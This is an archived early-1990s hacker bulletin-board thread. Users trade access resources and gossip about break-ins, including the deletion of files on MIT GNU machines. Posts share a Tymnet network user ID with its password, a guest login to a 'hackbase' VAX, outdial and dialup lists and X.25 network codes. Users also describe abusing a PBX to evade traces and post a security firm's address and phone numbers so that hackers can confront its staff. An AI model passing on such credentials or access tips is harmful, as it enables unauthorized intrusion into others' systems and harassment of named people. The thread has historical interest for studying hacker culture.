=========================
Message 42
From gandalf at 14:07:02 on Tue Jun 18
Subject: re: Leoben

are they on internet?


=========================

Message 43
From vmem at 18:52:54 on Tue Jun 18
Subject: Wing, and MiT

Gandy, even though you h8 the guy alot, he didn't cause Mit to shut down their
System's I talk to Noah Friedman and he said it was the guest acnt's that were
being asshole's trying to break into nasa shit, stupid code kid stuff
ftp
ing passwd files and shit... not Wing.
                       Virtual Memory
                          Baked Again :)

=========================

Message 44
From anduril at 21:26:13 on Tue Jun 18
Subject: re: re: leoben

No, don't think so.

There is a private X.25 net ( a ring ) connecting all Austrian
universities ( Aconet ).
As far as I know, only Vienna ( WU, UNI, TU) and Linz have got
Internet connectrivity yet.
Most hos
        ts on Aconet are VAXes running VMS => There is a lot
of DECnetting on Aconet.

I can provide most NUAS, but my list seems to be outdated since
the leased lines are insatlled.

/Anduril

=========================
Message 45
From gandalf at 21:46:36 on Tue Jun 18
Subject: wing & mit

vmem writes:
> System's I talk to Noah Friedman and he said it was the guest acnt's that were
being asshole's trying to break into nasa shit, stupid code kid stuff
ftp
ing passwd files and shit... not Wing.



what do u think wing used it for? ftp'ing passwd files and shit..
(yea go ask him if u like, i can givee u site
                                              names).

=========================
Message 46
From blammo at 02:24:30 on Wed Jun 19
Subject: ODs

can someone post the PCP OD list?
-midnite

=========================
Message 47
From lutz at 02:37:20 on Wed Jun 19
Subject: new account-proceedings

hiya all !
finally i got managed to write down all new behaviour

i thought of and discussed in the last time.
please inform urself by reading under 'accs'
greets
Lutz

Message 47
From lutz at 02:37:20 on Wed Jun 19
Subject: new account-proceedings

hiya all !
finally i got managed to write down all new behaviour
i thought of and discussed in the last time.
please inform urself by reading under 'accs'
greets
Lutz

=========================

Message 48
From touchton at 03:25:23 on Wed Jun 19
Subject: Hmmm..

I talked to Mr. Friedman as well today, applying for a legitimate guest
account, and he cited the reason as having been the recent deletion of
all files on a particular GNU system.  That might be the underlying
reason, in more specific detail.

                                - Plutus

=========================

Message 50
From galileo at 06:30:57 on Wed Jun 19
Subject: SOMEONE

Please someone delete msg 49.

Cheers Star_Gazer

=========================

Message 51
From feoh at 14:12:18 on Wed Jun 19
Subject: Wing and MIT

Well whether it was wing or not, this is what *really* happened that
led to GNU shutting down the machines a SECOND time in the past
few weeks... *someone*
A: truncated the password file in  an attempt to get themselves root.
B: deleted MASSIVE amounts of files, etc.
C: somehow installed a daemon to insure they'd always have an account. I
   Dont have details on this one yet so I'll keep ya posted.

-feoh

=========================

Message 52
From feoh at 14:13:24 on Wed Jun 19
Subject: new behavior (postage rates anybody?)

so are we supposed to use IRC's? or guess and use regular stamps?
and do we have the adress to send these things to yet?
just curious.

-feoh

=========================

Message 53
From mordor at 15:40:19 on Wed Jun 19
Subject: Wing

Yes Wing is responsable, he deleted all the files in the /bin
didirectory, this is the main reason why the guest accounts
died off !!!

People like wing have serious attitude problems, I would hope
that lutz might refrain from renewing his account
/\/\ordor


=========================

Message 54
From mordor at 15:41:32 on Wed Jun 19
Subject: MIT

Relating to the MIT machines, can anyone tell me how to mail
the request account on there ??, from this system or otherwise ??
Cheerz /\/\ordor

=========================
Message 55
From lutz at 18:07:18 on Wed Jun 19
Subject: Re: new behaviour (postage)

hi
yes, a friend said it already too...
i'll ask our post-office how to manage
that special situation.
the adress to send that stuff to is
already there, inside 'new' and also
on the 'formular' getable by 'request'.
greets, i'll hurry
(btw: does someone know a practical solution ?)

=========================

Message 56
From ronnie at 18:26:40 on Wed Jun 19
Subject:

well.. seeing as I dont stay in one place too long.. i dont see

what good my address would do to you anyway.. I could just

leave onewhere i could be contacted at.. thats

about the best i could do.

l.


=========================

Message 57
From feoh at 19:17:51 on Wed Jun 19
Subject: solution

I'd like to suggest a modification of your solution lutz...
rather than sending ppl their password, just have them include it in
the request letter.. if they're serious enough to actually write you
and mail the erequest I think you'll do ok..

Just a thought
-feoh


=========================
Message 58
From gandalf at 19:36:07 on Wed Jun 19
Subject: mailing mit

You could try mailing
altger!impch!root%mole.gnu.ai.mit.edu
from here.  As far as i know, the idea is that you mail them a
pre-crypted password, ie change ur password on some system
to what you want, and send them the encryption from your password
file.

=========================

Message 59
From blammo at 22:03:34 on Wed Jun 19
Subject: access

lutz-
do you really think it's necessary to go through all this trouble for
accounts? i can understand how you want to make sure each person gets only
one account..but mailing a password is quite a bit of trouble and won't
solve the problem. people could easily mail it to a friend, PO box, remailer,
or any number of places in order to obtain multiple accounts.
also, how will you benefit from having the real information?
the system seems to be running well as it is, aside from a few
occassional problems with users- which really can't be avoided in any
practical way.

=========================

Message 60
From kaleidox at 01:40:10 on Thu Jun 20
Subject: new access rules

Agreed...there are really not to many people who cause problems..it
seems unnecessary to have current users have passwords mailed to them..
Current users who start a problem can easily be deleted...


=========================

Message 61
From vmem at 06:26:02 on Thu Jun 20
Subject: Gandy Gandy


Dewdn, trust me, he maybe did alot of shit on MIT but why ftp passwd files?
most of the time they are shadowed, but I can remember why MIT MIGHT HAVE
DID IT, but I doubt it... And if you know, which I doubt, then send me mail
and tell me what he "did"
l8r
  Virtual Memory

=========================

Message 62
From dastar at 06:52:42 on Thu Jun 20
Subject: shit

Its always 1 mother fucker who ruins it for everyone else.  Same thing
happened with a local PBX.  I used it only on local calls to cloak
mysself from offending traces and such and some local fuck loser
abuses the fuck out of it calling long distance from it for hours at a
time and kills it.  All it takes is one shit he
                                               ad and they always seem
to find the things that matter to you.  At any rate, I agree that
users who currently already have an account shouldn't have to mail
their information to obtain a new account simply because it is a pain
in the ass.  Not a big pain in the ass but its something you just don't
want to do if you harbor any paranoid suspicions (as I do).  I really
sympathize with your situation Lutz, and I know that you want to keep
the dregs off as much as I as I have experienced the bullshit of other
users who don't take anything seriously (ie. Mr. "I'll enter .b 400
times just to piss everyone off-Gee I'm cool.").  At any rate, I
agree with Kaleidox.  Any user who is already on and causes trouble
can be deleted quite easily.  But if y
                                      ou insist on this procedure, I
just may do it.  A while back I suggested a feature wherein if a user
becomes a problem and it i>`woticed by a lot of people (thus to
counter potential abuse of the feature) they could all put in a vote
from a command in the main menu to kick the user off, and if enough
votes came in he would be automatically deleted (or subject to approval
from Lutz first so that people don't mercilessly gang up on some poor
dude).  Its not the greatest idea but it would work OK.


=========================
Message 63
From dastar at 07:01:07 on Thu Jun 20
Subject: stuff

I've heard of people getting busted lately, both first hand and
thru word of mouth.  Friend of mine got visited by the SS in April
and had all his shit confiscated.  It seems people hacking on ROLM
PBXs have been getting nailed.  Seems after that ROLM HACK file got
out to a lot of people and the abuse started getting major, ROLM
decided to fight back and nab the people fucking with their PBXs.
Anyway, in America, like i
                          t or not, we live in a fucked and, yes,
oppressive society (if you're not a G. Bush clone).  Our rights are
being insidiously eroded away with each passing day and each new bill
passed in the legislature.  We're being fucked.  I'm pissed.  A lot
of hackers are going down simply because they have intelligence,
                                                                 which
is something that scares the government.  That's a fucking tragedy.
So Fuck the Government, Fuck the Beauracracy, and Fuck the Politicians.
...and stay free!
DC

=========================
Message 64
From galileo at 14:14:39 on Thu Jun 20
Subject: PCP list

Yo midnite et all
Hope this is some use:


              The Warped Reality PC-PURSUIT Outdial Listing
                   Compiled 5-12-91 by Disk Jockey/WR

   Additions, corrections (please check these!), and deletions, call:
         800-288-2699, box 872; hit # after it is done talking.

Area codes not shown are invalid, in Canada, or not in continental US.
These areas are not served by PC-PURSUIT.

FORMAT: 3110aaa00xxx. aaa=Area Code, xxx=numbers below.
NOTE: ^=working but baud unchecked, ?=completely unchecked.

AREA 300     1200       2400        AREA 300        1200       2400
CODE Baud    Baud       Baud        CODE Baud       Baud       Baud
---  ------- ---------- ----------  ---  ---------- ---------- ----------

201..........001^,301^..022?......  202..115?.......116?,301?..117?,703?.
203..121.....120........105.......  205..................................
206..205^....206^.......208^......  207..................................
208...............................  209..................................
212..316?....315?.......028?,718?.  213..103^,412^..456?.......413^,023..
214..117?....118?.......022?,817?.  215..005?.......112?.......022?......
216..020?....021?.......120?......  217..................................
218...............................  219..................................
301...............................  302..................................
303..114?....021?.......115?......  304..................................
305..120?....121?.......122?......  307..................................
308...............................  309..................................
312..410?....411?,815?..024?,022?.  313..214?.......216?.......024?......
314..217?....020?,815?..005?,312?.  315..................................
316...............................  317..................................
318...............................  319..................................
401...............................  402..................................
404..113?....114?.......022?......  405..................................
406...............................  407..................................
408..110?....111?.......021?......  409..................................
412...............................  413..................................
414..020?....021?.......120?......  415..005,108?,..109?,216?,.011,217?,.
..................................  ^^^..215?.......023?.......224?......
417...............................  419..................................
501...............................  502..................................
503..020?....021..................  504..................................
505...............................  507..................................
508...............................  509...........................
                                                                  .......
512...............................  513..................................
515...............................  516..015........014..................
517...............................  518..................................
601.....................023?......  602..022?.......023?.......026?......
603...............................  605..................................
606...............................  607..................................
608...............................  609..................................
612..120?....121?.......022?......  614..........................
                                                                 ........
615...............................  616..................................
617...............................  618..................................
619...............................  701..................................
702...............................  703..................................
704...............................  707..................................
708...............................  712..................................


713..113?.......114.....024?......  714..023?,119?,.024?,121?,.004?,102?,
..................................  ^^^..210?.......213?.......619?......
715...............................  716..................................
717
   ...............................  718........................352?......
719...............................  801..020?.......021?.......124?,012?.
802...............................  803..................................
804...............................  805........................030?......
806...............................  808..................................
809...............................  812..................................
813..020?.......021?....124.......  814..................................
815.....................310?......  816..104?.......113?.......913?......
817...............................  818..020?.......021?.......124?......
901...............................  903..................................
904...............................  906..................................
907.....................030?......  908..................................
912...............................  913..................................
914...............................  915..................................
916...............................  918..................................
919...............................


=========================
Message 65
From gandalf at 14:52:06 on Thu Jun 20
Subject: re gandy gandy

vmem: rather than me sendin u mail, go take a look at his directory
at mit - ask someone to restore it from backups if it aint there
(and if they have backups).

and for the record, most passwd files still arent shadowed.
about 3% of sun users bother to install the C2 security package.

=========================
Message 66
From mayhem at 15:00:11 on Thu Jun 20
Subject: another PCP list


           TeleNet PC-Pursuit OutDials Compiled and Formatted By Ixom

   +-New Jersey-------------------+
   | 03110 201 00 001   1200 Baud |
   | 03110 201 00 022   2400 Baud |
   | 03110 201 00 301   1200 Baud |
   +-District of Columbia---------+          +-Wisconsin--------------------+
   | 03110 202 00 115    300 Baud |          | 03110 414 00 020    300 Baud |
   | 03110 202 00 116   1200 Baud |          | 03110 414 00 021   1200 Baud |
   | 03110 202 00 117   2400 Baud |          | 03110 414 00 120   2400 Baud |
   +-Connecticut------------------+          +-California-------------------+
   | 03110 203 00 105   2400 Baud |          | 03110 415 00 005   2400 Baud |
   | 03110 203 00 120   1200 Baud |          | 03110 415 00 011   2400 Baud |
   | 03110 203 00 121    300 Baud |          | 03110 415 00 023   ???? Baud |
   +-?????------------------------+          | 03110 415 00 108    300 Baud |
   | 03110 205 00 005   1200 Baud |          | 03110 415 00 109   1200 Baud |
   | 03110 205 00 022   2400 Baud |          | 03110 415 00 215    300 Baud |
   +-Washington-------------------+          | 03110 415 00 216   1200 Baud |
   | 03110 206 00 205    300 Baud |          | 03110 415 00 217   2400 Baud |
   | 03110 206 00 206   1200 Baud |          | 03110 415 00 224   2400 Buad |
   | 03110 206 00 208   2400 Baud |          +-Oregon-----------------------+
   +-New York---------------------+          | 03110 503 00 020    300 Baud |
   | 03110 212 00 028   2400 Baud |          | 03110 503 00 021   1200 Baud |
   | 03110 212 00 315   1200 Baud |          +-Arizona----------------------+
   | 03110 212 00 316   ???? Baud |          | 03110 602 00 021   1200 Baud |
   +-California-------------------+          | 03110 602 00 022    300 Baud
   | 03110 213 00 023   2400 Baud |          | 03110 602 00 023   1200 Baud |
   | 03110 213 00 103   1200 Baud |          | 03110 602 00 026   2400 Baud |
   | 03110 213 00 412   1200 Baud |          +-Minnesota--------------------+
   | 03110 213 00 413   2400 Baud |          | 03110 612 00 022   2400 Baud |
   +-Texas------------------------+          | 03110 612 00 120    300 Baud |
   | 03110 214 00 022   2400 Baud |          | 03110 612 00 121   1200 Baud |
   | 03110 214 00 117    300 Baud |          +-Massachussetts---------------+
   | 03110 214 00 118   1200 Baud |          | 03110 617 00 026   2400 Baud |
   +-Pennsylvania-----------------+          | 03110 617 00 311    300 Baud |
   | 03110 215 00 005    300 Baud |          | 03110 617 00 313   1200 Baud |
   | 03110 215 00 022   2400 Baud |          +-Texas------------------------+
   | 03110 215 00 112   1200 Baud |          | 03110 713 00 024   2400 Baud |
   +-Ohio-------------------------+          | 03110 713 00 113    300 Baud |
   | 03110 216 00 020    300 Baud |          | 03110 713 00 114   1200 Baud |
   | 03110 216 00 021   1200 Baud |          +-California-------------------+
   | 03110 216 00 120   2400 Baud |          | 03110 714 00 004   2400 Baud |
   +-?????------------------------+          | 03110 714 00 021   2400 Baud |
   | 03110 301 00 020   1200 Baud |          | 03110 714 00 023    300 Baud |
   +-Colorado---------------------+          | 03110 714 00 024   1200 Baud |
   | 03110 303 00 021   1200 Baud |          | 03110 714 00 102   2400 Baud |
   | 03110 303 00 114    300 Baud |          | 03110 714 00 119    300 Baud |
   | 03110 303 00 115   2400 Baud |          | 03110 714 00 121   1200 Baud |
   +-Florida----------------------+          | 03110 714 00 210    300 Baud |
   | 03110 305 00 120    300 Baud |          | 03110 714 00 213   1200 Baud |
   | 03110 305 00 121   1200 Baud |          +-Utah-------------------------+
   | 03110 305 00 122   2400 Baud |          | 03110 801 00 012   2400 Baud |
   +-Illinois---------------------+          | 03110 801 00 020    300 Baud |
   | 03110 312 00 024   2400 Baud |          | 03110 801 00 021   1200 Baud |
   | 03110 312 00 410    300 Baud |          +-Florida----------------------+
   | 03110 312 00 411   1200 Baud |          | 03110 813 00 020    300 Baud |
   +-Michigan---------------------+          | 03110 813 00 021   1200 Baud |
   | 03110 313 00 024   2400 Baud |          | 03110 813 00 124   2400 Baud |
   | 03110 313 00 214    300 Baud |          +-Missouri---------------------+
   | 03110 313 00 216   1200 Baud |          | 03110 816 00 104    300 Baud |
   +-Missouri---------------------+          | 03110 816 00 113   2400 Baud |
   | 03110 314 00 005   2400 Baud |          | 03110 816 00 221   1200 Baud |
   | 03110 314 00 020   1200 Baud |          +-California-------------------+
   | 03110 314 00 421   1200 Baud |          | 03110 818 00 021   1200 Baud |
   +-Alabama----------------------+          +-California-------------------+
   | 03110 404 00 022   2400 Baud |          | 03110 916 00 007   2400 Baud |
   | 03110 404 00 113    300 Baud |          | 03110 916 00 011    300 Baud |
   | 03110 404 00 114   1200 Baud |          | 03110 916 00 012   1200 Baud |
   +-California-------------------+          +-North Carolina---------------+
   | 03110 408 00 021   2400 Baud |          | 03110 919 00 020    300 Baud |
   | 03110 408 00 110    300 Baud |          | 03110 919 00 021   1200 Baud |
   | 03110 408 00 111   1200 Baud |          | 03110 919 00 124   2400 Baud |
   +------------------------------+          +------------------------------+


DATAPAC OUTDIAL PUBLIC DIAL PORTS/LAST UPDATED: 89-11-15
DATAPAC PUBLIC OUT-DIAL PORT CIRCUIT NUMBERS



=========================

Message 67
From fener at 20:55:50 on Thu Jun 20
Subject: Advice

The simple act of pu~rtting on a condom can save ur life!
Fener.

=========================

Message 68
From talmeta at 04:04:25 on Fri Jun 21
Subject: access

True...I have no problem with
the new rules..but having a new pw mailed to me seems a bit excessive.
besides...where am I gonna send a prepaid envelope to ?

=========================

Message 69
From dastar at 06:03:49 on Fri Jun 21
Subject: help someone?

Out of the good of your hacker heart and in the name of free information
exchange could one of you please mail me a working nui other than
dynapac1 that will reach here and not be so damned slow?  I'd really
appreciate it.  Thanks.....

=========================

Message 70
From orpheus at 08:16:40 on Fri Jun 21
Subject: translation

can sum1 who speeks some french pleese give me a rough translationof
the following 3 sentences. thank u

**
Faire AIDE pour la liste des classes.
ATTENTION LE PACX NE SERA PAS DISPONIBLE MERCREDI LE 26 JUIN DE 19:00 A 24:00
POUR PASSER DU PACX 1000 AU NOUVEAU PACX STARMASTER DE GANDALF.

classe de service
-orpheus

=========================

Message 71
From mordor at 10:52:21 on Fri Jun 21
Subject: Tymnet NUI

Here is a tymnet nui :
Username : T.hongb01
Password : Host Only
There you go happy u know wot!

=========================

Message 72
From gandalf at 14:23:07 on Fri Jun 21
Subject: re: translation

dunno what the franch means, but it looks like a gandalf pacx

try help to list the services; if theres no help available
u should try numbers - 1, 2, 3 etc which are usually assigned  to
the services as well as names.

=========================

Message 73
From galileo at 16:23:58 on Fri Jun 21
Subject: French garbage

Type AIDE for the list of "classes"?
Your attention: The PACX will not be available wednesday the 26th of June betwee
n 19:00 to 24:00 due to upgrading from PACX 1000 to the new GANDALF STARMASTER P
ACX.


Well, my french is pretty shit, but that should be roughly what it means.

=========================

Message 75
From orpheus at 17:57:10 on Fri Jun 21
Subject: gandalf

its a pacx, and there is a list of services too
1 service is datapac (pad) and externe (outdials)
whenever i type datapac tho it says CLASS INTERDITE (whatever that means) and ha
ngs up
same with the externe.

=========================

Message 76
From orpheus at 17:58:01 on Fri Jun 21
Subject: wow!

thanx galileo! muaha another starmaster. another pad. that makes it 7 pads.

=========================

Message 77
From galileo at 18:42:20 on Fri Jun 21
Subject: CLASS INTERDITE

Hmmm I think it means sommin like SOD OFF!

No, really, INTERDITE means "Not allowed", still don't get what they mean by CLA
SS though.

=========================

Message 78
From orpheus at 19:32:01 on Fri Jun 21
Subject: class

class is same as request, or service.

=========================

Message 79
From dastar at 01:16:18 on Sat Jun 22
Subject: nui

Thanks for the nui.  I appreciate it.  Could someone post as complete
a CBI dialup list as they have?  I only have these five:

  305/467-3601
  612/341-0023
  713/591-8100
  804/466-1619
  916/635-3935



=========================

Message 82
From kaleidox at 20:03:50 on Sat Jun 22
Subject: files

Where can Heartz' files on Gandalfs' be found? They really -would- be
helpful...


=========================

Message 83
From dastar at 22:33:04 on Sat Jun 22
Subject: yes

I was going to ask the same thing.  Please post them here if possible.


=========================

Message 85
From em at 23:26:46 on Sat Jun 22
Subject: GridPoint BBS

CALL THE GRIDPOINT BBS! (718)/897-2521

WE ARE PcPable AT 311021201305
 (dial in the format atdt17188972521)

   This board is completely devoted to the discussion of
Hacking, and how to use assorted operating systems. Everyone
is welcome.
   We have 135 megs available being filled rapidly with files.

=========================

Message 86
From blammo at 00:37:07 on Sun Jun 23
Subject: people

thanks for both OD lists!

=========================

Message 87
From quasar at 11:12:20 on Sun Jun 23
Subject: solution by feoh

...yeah ... think its a great idea !
quasar/cult/uucp

=========================

Message 88
From galileo at 05:30:45 on Tue Jun 25
Subject: DNIC list

Has anybody got a list of DNICS complete with country names?
If so, could they please put it up.

Cheers

Gazer

=========================

Message 90
From blammo at 09:16:49 on Tue Jun 25
Subject: DNICs

Here are some DNICs w/countries that I have:

DNIC    Country         Network

2041    Netherlands
2062    Belgium
2080    France          TransPac
2141    Spain
2145    Spain
2201    Yugoslavia
2222    Italy
2284    Switzerland
2341    UK
2342    UK
2348    UK
2352
2382    Denmark
2405    Sweden
2402    Sweden
2422    Norway
2442    Finland
2502    USSR
2624    Germany
2704    Luxembourg
2724    Ireland
3020    Canada          DataPac
3025    Canada
3029    Canada
3103    US              ITT
3104    US              WUI/MCI
3106    US              TymNet
3110    US              TeleNet
3125    US
3126    US              AutoNet
3134    US              AccuNet
4408    Japan
5052    Australia
5053    Aus
           tralia
5252    Singapore
5301    New Zealand
6550    South Africa
65MNB*+QCAfrica
6559    South Africa
4872    Taiwan

=========================
Message 91
From gauloise at 17:59:59 on Tue Jun 25
Subject: DNICS

Country         Network    DNIC

-------------------------------


Antigua &   !    AGANET     3443

Barbuda     !

            !

Argentina   !    ARPAC      7220

            !    ARPAC      7222

            !

Australia   !    AUSTPAC    5052

            !    DAS        5053

            !    TELETEX    5054

            !

Bahamas     !    BATELCO    3640

            !

Bahrain     !    BAHNET     4263

            !

Barbados    !    IDAS       3423

            !

Belgium     !    DCS        2062

            !    ????       2063

            !    DCS        2068

            !    DCS        2069

            !

Bermuda     !    C&W(IDAS)  3503

            !

Brasil      !    INTERDATA  7240

            !    RENPAC     7241

            !    RENPAC     7248

            !    RENPAC     7249

            !

Bulgaria    !    BULPAC     2841

            !

Chile       !    E-COM      7302 (very interesting)

            !    CHILEPAC   7303

            !    TOMNET     7305

            !

China       !    PKTELKOM   4600

            !

China       !    PACNET     4872

(Taiwan)    !    PACNETII   4873

            !    UDAS       4877

            !

Costa Rica  !    RACSAPAC   7122

            !    RACSP C   7128

            !    RACSAPAC   7129

            !

Curacao     !    UDTS       3620

            !

Denmark     !    DATEX      2381

            !    DATAPAK    2382

            !    DATAPAK    2383

            !

Dominicanic !    UDTS       3700

Republic    !

            !

Ivory-Coast !    SYTRANPAC  6122

            !

Finnland    !    DATEX      2441

            !    DATAPAK    2442

            !    DIGIPAK    2443

            !

France      !    TRANSPAC   2080

            !    NTI        2081

            !    VX32       2089

            !    TRANSPAC   842A

            !    TRANSPAC   933A

            !

French      !    TRANSPAC   2080

Antilles    !

            !

French      !    TRANSPAC   2080

Guayana     !

            !

French      !    TOMPAC-PF  5470

Polynesia   !

            !

Gabon       !    GABONPAC   6282

            !

Greece      !    HELPAK     2022

            !    HELLASPAC  2023

            !

Greenland   !    KANUPAK    2901

            !

Great Brit. !    BTI IPSS   2341

            !    BT PSS     2342

            !    Mercury    2350

            !    HT         2352

            !

Guam        !    PACNET     5351

            !

Guadeloupe  !    TRANSPAC   2080

            !

Guatemala   !    GUATEL     704A

            !

Honduras    !    HONDUTEL   7080

            !

Honkong     !    INTELPAK   4542

            !    DAS        4544

            !    DATAPAK    4545

            !

Hungary     !    DATEX-L    2160

            !

India       !    GPSS       4042

            !

Indonesia   !    SKDP       5101

            !

Ireland     !    EIRPAC     2724

            !

Island      !    ICEPAK     2740  (Pack-Ice)

            !

Israel      !    ISRANET    4251

            !

Italy       !    ITAPAC     2222

            !    ITAPAC     2227

            !

Jamaica     !    JAMANTEL   3380

            !

Japan       !    DDX-P      4401

            !    VENUS-P    4408

            !

Jugoslavia  !    YUPAC      2201

            !

Kaimanisl.  !   ????       3463

            !

Cameroon    !    CAMPAC     6242 (weally weally weird)

            !

Canada      !    DATAPAC    3020

            !    GLOBEDAT-P 3025

            !    INFOGRAM   3028

            !    INFOSWITCH 3029

            !

Columbia    !    COLDAPACQ  7320 (Not COKENET 8-)  )

            !

Korea       !    DACOMNET   4501

            !

Cuba        !    KUPAC      368A

            !

Kuwait      !    via Bah.   427A

            !

Lebanon     !    CEDARPAC   4155

            !

Luxemburg   !    LUXPAC     2704

            !    LUXPAC     2709

            !

Malaysia    !    MAYPAC     5021

            !

Malta       !    MALTAPAC   2782

            !

Morocco     !    ????       604A

            !

Martinique  !    TRANSPAC   2782

            !

Mauritius   !    MAURIDATA  6170

            !

Mexico      !    TELEPAC    3340

            !

Namibia     !    SWANET     6490

            !

New Caledon.!    TOMPAC-NC  5460

            !

Newzealand  !    PACNET     5301

            !

Netherlands !    DATANET1   2040

            !    DATANET1   2041

            !    DATANET1   2049

            !

Norway      !    DATAPAK    2422

            !    RADAUS     2329

            !

Panama      !    INTELPAQ   7141

            !

Papua-New-  !    PNGPAC     5053

Guinea      !

            !

Peru        !    ENTEL      716A

            !

Phillipenis !    DATANET    5151

            !    WORLDNET   5152

            !    GMCR       5154

            !    EASTNET    5156

            !

Portugal    !    TELEPAC-P  2680

            !

Puerto Rico !    UDTS       3300

            !

Reunion     !    TRANSPAC   2080

            !

San Marino  !    X-NET      2922

            !

Saudi-Arabia!    via Bah.   420A

            !

Sweden      !    DATEX      2401

            !    DATAPAK    2402

            !    DATAPAK    2403

            !

Switzerland !    TELEPAC    2284

            !

Senegal     !    SENPAC     6081

            !

Singapor    !    TELEPAC    5252

            !

Spain       !    NID        2141

!`           !  IBERPAC    2145

South-Africa!    SAPONET-P  6550

            !    SAPOPAC    6559

            !

Thailand    !    IDARC      520A

            !

Trinidad &  !    TEXTEL     3740

Tobago      !    DATANET    3745

            !

Turkey      !    TURPAC     2862

            !

Tunesia     !    RED25      6050

            !

USSR        !    IASNET     2502

            !

Uruguay     !    URUPAC     7482

            !

Vanuatu     !    VIAPAC     5410

            !

Venezuela   !    PDVSA-P    734A

--------------------------------



That's about all I know. It may not be complete, but nearly.

Ican't tell u, if all of them work, coz it depends from which

network u dial in.



  ___________

 / __

 \__/auloise



=========================
Message 92
From anduril at 18:58:42 on Tue Jun 25
Subject: DNICS again ..

Austria is missing !
The DNIC of Datex-P is 02322

/Anduril

=========================

Message 93
From galileo at 02:47:32 on Wed Jun 26
Subject: THANKS (Dnics)

Just a big thank you to Gauloise, Midnite and Anduril
for the helpful Dnic lists.

Gali

=========================

Message 94
From mayhem at 14:31:30 on Wed Jun 26
Subject: hackbase



      The hackbase at the VAX/VMS Node: LINA is back up.



              Adress: 22222800173 Login: GUEST

           Just type @hackbase for instant access.

Dont abuse this system folks, its a great place to trade files.



                 -Mayhem- Cliff Burton



=========================
Message 97
From galileo at 05:07:37 on Fri Jun 28
Subject: @hackbase

WELL, THAT SEEMS TO BE FUCKED TOO.

=========================

Message 99
From midas at 17:14:35 on Fri Jun 28
Subject: DYNAPAC MULTIPADS

this has existed for about 4 years now.. 505233222006
it declares itself to be a dynapac: multipad.25 and then hangs
I small reward for anyone who can pad out from here, but any
assistance appreciated !

   midas

=========================

Message 100
From cyclopz at 21:20:10 on Fri Jun 28
Subject: 800#'s

How about Puttin Up some 800 #;s fer network services like
datapac,tymnet,telenet...etc...etc...
they would be greatly appreciated
Now ill go back ta sleep...
CyClopz!...

=========================

Message 101
From spirit at 00:25:10 on Sat Jun 29
Subject: Unix

Hey if any of you Unix hackers out there can send me some source code
or just some general information about accessing kernel data structures, it woul
d be appreciated.
I have messed with this in a limited sense, I am just lookingferent techniques a
nd ideas.

                                        Thanks,
So.

=========================

Message 102
From blammo at 01:32:18 on Sat Jun 29
Subject: stuff

cyclopz-
just go to each network's info section for a list of dialups.
use "information" on tymnet, "c mail" phones/phones on telenet,
or you can call merit (313 40 off autonet, type "c merit") and enter
"help" at the "which host?" prompt. merit has all dialups for
sprintnet (telenet), datapac, autonet, mibell (michigan bell), and

i think a few other networks..

so-
"unix programmer's reference" by john valley (que books) has a decent
section on unix kernal. if you have any questions i'll poke around an
(er..and) see what i can find for you..but i don't know much about the kernal
myself, so i don't know if i can help..but check out the book if you find
it..

-midnite

=========================
Message 103
From silent at 03:44:37 on Sat Jun 29
Subject: 800s

1-800-222-0555---Tymnet

=========================

Message 104
From feoh at 10:33:36 on Sat Jun 29
Subject: translation

No guarantees. (french is rusty)
but I wanted to try anyway:
Type AIDE for a list of classes
2:Attention: the pacx will be down 26 june from 19:00 to 24:00 hrs

I think thats basically it. hope it helps

=========================

Message 105
From feoh at 10:51:00 on Sat Jun 29
Subject: Mailing MIT

Good idea gand, exept that you might mention to mail to request'(@gnu rather tha
n root
because root could be the WRONG ppl whereas request ARE the right ppl.

=========================

Message 106
From midas at 16:07:31 on Sat Jun 29
Subject: EDSNET

Anyone have any clues on EDSNET by Electronic Data Systems ??
Any help appreciated
    Midas

=========================

Message 107
From spirit at 22:30:51 on Sat Jun 29
Subject: EDS

is a large company in Dallas, TX.  They handle parts & desigs for
General Motors.  I imagine that'd require a pretty large computer net.
Sorry dunno anything about EDSNET itself.

So.

=========================

Message 108
From hstreet at 20:07:40 on Sun Jun 30
Subject: Hey!

Elite HackBase Deleter has now changed his name to...

The Elite HackBase Terroist!
i will make your hackbase a living hell!
by using my superior skills to demolish your hard work
and exposing you for the lamers you are
and keeping you ignorant so that you are docile and easy to Control!

=========================

Message 109
From galileo at 03:08:53 on Mon Jul  1
Subject: Hackbase

Just set protection to no-delete to all,
including system and he's well and truly
fucked.

If you plan to put it back up, let me know.

=========================

Message 110
From cyclopz at 05:00:51 on Mon Jul  1
Subject: Hackbas Terrorsit

He Calls Himself the ELITE HACKBASE TERRORIST!
But You Can Call Him, Code Of Honor, Or Coh Or Cocksucker!
Yes, You guessed it, CODE OF HONOR is the Hackbase Deleter..
More Information soon......Haha....Elite? I doubt it, terrorist
definitely...THE END IS NEAR....

=========================

Message 111
From midas at 12:01:40 on Mon Jul  1
Subject: edsnet

No, the system is DESIGNED by EDS..  The actual system is in australia... (a ban
k)

=========================

Message 112
From midas at 12:06:34 on Mon Jul  1
Subject: hackbase...

Here I am, fresh from AUSTRALIA (know where that is, Mr Elite ??)
and a little out of touch with world hacking ,  and what crap do i see?
'ELITE HACKBASE TERRORIST' ?????????


     childish

mIDASmAN

=========================

Message 113
From orpheus at 20:19:31 on Mon Jul  1
Subject: 2600 meetin

could sum1 tell me where the citicorp bld. is in ny so i caan get 2 the
meetin. (like whut streets it on)
thank u

=========================

Message 114
From hstreet at 23:50:44 on Mon Jul  1
Subject: hello!

Comsec
Computer Securty Corporation.
-----------------------------

A company formed by 1 ex-lod member and 2 of hs frends to detroy hackers
to inform and secure system and catch hackers.
Erik bloodaxe,Doc holiday and Malefactor

the compnay is n 60 braeswood sq
houston , tx
713-721-6500 / 713-683-5742

remember they are ex-hackers and they want to destroy and catch YOU!
call them and see what s up.

=========================

Message 119
From mayhem at 12:58:02 on Wed Jul  3
Subject: get_a_life!


Hackbase Terrorist? And he says that we're lame (chuckle).. it
probably took him much longer to figure out how to delete those
files than it will take for me to upload them again. ( I backed them
up because I had a feeling MOD would do something this immature)
Hackbase would be up already, but the #$%@#$'n sysop is out to
lunch, and hasnt created my account yet.. its been a week.
Anyways, I'm sure he has much more pressing matters than to give
out guest accounts..

 -mayhem-

 ps. hstreet: read the subject, and heed it!

=========================

Message 120
From mayhem at 13:28:26 on Wed Jul  3
Subject: MEGASCAN.bas



       **  MegaScan Version 1.0
     ****  For DATAPAC only
       **  By Mayhem (Midnite Society)



DISCLAIMER:  I have only written this program as an example. If you use it
             I cannot be held responsible. If you dont agree with this
             dont download and/or run it.


This is formatted for systems with only 80 column capability. Delete all the
~ characters, and make the lines continuous WITHOUT carriage returns.


 -mayhem-

  mayhem@paranoia.uafcs.alaska.edu


